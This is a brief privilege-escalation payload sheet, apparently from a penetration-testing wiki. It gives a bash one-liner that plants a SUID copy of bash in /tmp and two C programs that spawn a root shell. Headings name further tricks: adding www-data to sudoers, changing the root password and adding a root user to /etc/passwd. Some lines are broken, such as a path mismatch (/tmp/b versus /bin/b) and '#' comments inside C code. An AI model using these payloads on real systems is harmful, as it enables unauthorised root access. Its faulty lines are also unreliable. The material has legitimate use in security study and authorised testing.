Payloads to execute

Bash

cp /bin/bash /tmp/b && chmod +s /tmp/b
/bin/b -p #Maintains root privileges from suid, working in debian & buntu

C

#gcc payload.c -o payload
int main(void){
    setresuid(0, 0, 0); #Set as user suid user
    system("/bin/sh");
    return 0;
}
#gcc payload.c -o payload
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main(){
    setuid(getuid());
    system("/bin/bash");
    return 0;
}

Scripts

Can you make root execute something?

www-data to sudoers

Change root password

Add new root user to /etc/passwd

最后更新于

这有帮助吗?